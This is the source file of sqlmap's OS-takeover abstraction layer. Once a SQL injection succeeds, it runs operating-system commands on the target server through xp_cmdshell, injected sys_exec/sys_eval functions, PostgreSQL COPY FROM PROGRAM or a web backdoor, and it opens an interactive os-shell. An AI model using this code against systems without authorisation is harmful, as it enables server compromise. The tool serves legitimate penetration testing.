#!/usr/bin/env python """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ from __future__ import print_function import sys from lib.core.common import Backend from lib.core.common import dataToStdout from lib.core.common import getSQLSnippet from lib.core.common import isStackingAvailable from lib.core.common import readInput from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import logger from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import DBMS from lib.core.enums import OS from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.shell import autoCompletion from lib.request import inject from lib.takeover.udf import UDF from lib.takeover.web import Web from lib.takeover.xp_cmdshell import XP_cmdshell from lib.utils.safe2bin import safechardecode from thirdparty.six.moves import input as _input class Abstraction(Web, UDF, XP_cmdshell): """ This class defines an abstraction layer for OS takeover functionalities to UDF / XP_cmdshell objects """ def __init__(self): self.envInitialized = False self.alwaysRetrieveCmdOutput = False UDF.__init__(self) Web.__init__(self) XP_cmdshell.__init__(self) def execCmd(self, cmd, silent=False): if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): self.copyExecCmd(cmd) elif self.webBackdoorUrl and not isStackingAvailable(): self.webBackdoorRunCmd(cmd) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): self.udfExecCmd(cmd, silent=silent) elif Backend.isDbms(DBMS.MSSQL): self.xpCmdshellExecCmd(cmd, silent=silent) else: errMsg = "Feature not yet implemented for the back-end DBMS" raise SqlmapUnsupportedFeatureException(errMsg) def evalCmd(self, cmd, first=None, last=None): retVal = None if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): retVal = self.copyExecCmd(cmd) elif self.webBackdoorUrl and not isStackingAvailable(): retVal = self.webBackdoorRunCmd(cmd) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): retVal = self.udfEvalCmd(cmd, first, last) elif Backend.isDbms(DBMS.MSSQL): retVal = self.xpCmdshellEvalCmd(cmd, first, last) else: errMsg = "Feature not yet implemented for the back-end DBMS" raise SqlmapUnsupportedFeatureException(errMsg) return safechardecode(retVal) def runCmd(self, cmd): choice = None if not self.alwaysRetrieveCmdOutput: message = "do you want to retrieve the command standard " message += "output? [Y/n/a] " choice = readInput(message, default='Y').upper() if choice == 'A': self.alwaysRetrieveCmdOutput = True if choice == 'Y' or self.alwaysRetrieveCmdOutput: output = self.evalCmd(cmd) if output: conf.dumper.string("command standard output", output) else: dataToStdout("No output\n") else: self.execCmd(cmd) def shell(self): if self.webBackdoorUrl and not isStackingAvailable(): infoMsg = "calling OS shell. To quit type " infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) else: if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): infoMsg = "going to use 'COPY ... FROM PROGRAM ...' " infoMsg += "command execution" logger.info(infoMsg) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): infoMsg = "going to use injected user-defined functions " infoMsg += "'sys_eval' and 'sys_exec' for operating system " infoMsg += "command execution" logger.info(infoMsg) elif Backend.isDbms(DBMS.MSSQL): infoMsg = "going to use extended procedure 'xp_cmdshell' for " infoMsg += "operating system command execution" logger.info(infoMsg) else: errMsg = "feature not yet implemented for the back-end DBMS" raise SqlmapUnsupportedFeatureException(errMsg) infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX) while True: command = None try: command = _input("os-shell> ") command = getUnicode(command, encoding=sys.stdin.encoding) except KeyboardInterrupt: print() errMsg = "user aborted" logger.error(errMsg) except EOFError: print() errMsg = "exit" logger.error(errMsg) break if not command: continue if command.lower() in ("x", "q", "exit", "quit"): break self.runCmd(command) def _initRunAs(self): if not conf.dbmsCred: return if not conf.direct and not isStackingAvailable(): errMsg = "stacked queries are not supported hence sqlmap cannot " errMsg += "execute statements as another user. The execution " errMsg += "will continue and the DBMS credentials provided " errMsg += "will simply be ignored" logger.error(errMsg) return if Backend.isDbms(DBMS.MSSQL): msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function " msg += "is disabled by default. This function is needed to execute " msg += "statements as another DBMS user since you provided the " msg += "option '--dbms-creds'. If you are DBA, you can enable it. " msg += "Do you want to enable it? [Y/n] " if readInput(msg, default='Y', boolean=True): expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") inject.goStacked(expression) # TODO: add support for PostgreSQL # elif Backend.isDbms(DBMS.PGSQL): # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") # inject.goStacked(expression) def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): self._initRunAs() if self.envInitialized and not forceInit: return if web: self.webInit() else: self.checkDbmsOs(detailed) if mandatory and not self.isDba(): warnMsg = "functionality requested probably does not work because " warnMsg += "the current session user is not a database administrator" if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): warnMsg += ". You can try to use option '--dbms-cred' " warnMsg += "to execute statements as a DBA user if you " warnMsg += "were able to extract and crack a DBA " warnMsg += "password by any mean" logger.warn(warnMsg) if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): success = True elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): success = self.udfInjectSys() if success is not True: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) elif Backend.isDbms(DBMS.MSSQL): if mandatory: self.xpCmdshellInit() else: errMsg = "feature not yet implemented for the back-end DBMS" raise SqlmapUnsupportedFeatureException(errMsg) self.envInitialized = True